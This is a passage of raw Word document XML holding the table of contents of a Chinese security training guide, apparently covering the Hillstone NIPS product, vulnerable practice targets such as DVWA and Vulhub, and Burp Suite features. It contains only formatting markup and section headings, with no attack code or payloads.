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272784674"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00864224" w:rsidRDefault="00864224">
          <w:pPr>
            <w:pStyle w:val="TOC"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
          <w:bookmarkStart w:id="0" w:name="_GoBack"/>
          <w:bookmarkEnd w:id="0"/>
        </w:p>
        <w:p w:rsidR="00FD53C7" w:rsidRDefault="00864224">
          <w:pPr>
            <w:pStyle w:val="13"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="420"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8540"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc499884677" w:history="1">
            <w:r w:rsidR="00FD53C7" w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00FD53C7">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FD53C7" w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>网络安全形势概要</w:t>
            </w:r>
            <w:r w:rsidR="00FD53C7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FD53C7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FD53C7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884677 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FD53C7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FD53C7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FD53C7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00FD53C7">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678" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:smallCaps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>网络安全现状：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884678 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</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679" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:smallCaps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>威胁发展的趋势：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884679 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD53C7" w:rsidRDefault="00FD53C7">
          <w:pPr>
            <w:pStyle w:val="13"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="420"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8540"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc499884680" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Hillstone NIPS产品介绍</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884680 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</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681" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:smallCaps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NIPS单品安全防御功能</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884681 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD53C7" w:rsidRDefault="00FD53C7">
          <w:pPr>
            <w:pStyle w:val="13"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="420"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8540"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc499884682" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>常用安全测试工具介绍</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884682 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</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683" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:smallCaps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>常用靶机的搭建介绍</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884683 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</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84" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DVWA:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884684 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</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85" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OWASP Mutillidae</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884685 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>53</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86" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vulhub</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884686 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</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687" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:smallCaps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Burp Suite</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884687 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</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688" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>概述</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884688 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</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89" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Proxy工具</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884689 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>64</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0" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Target功能</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884690 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>66</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1" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Spider功能</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884691 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>67</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2" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scanner功能</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884692 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>68</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3" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Intruder</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884693 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>73</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4" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Repeater</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884694 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
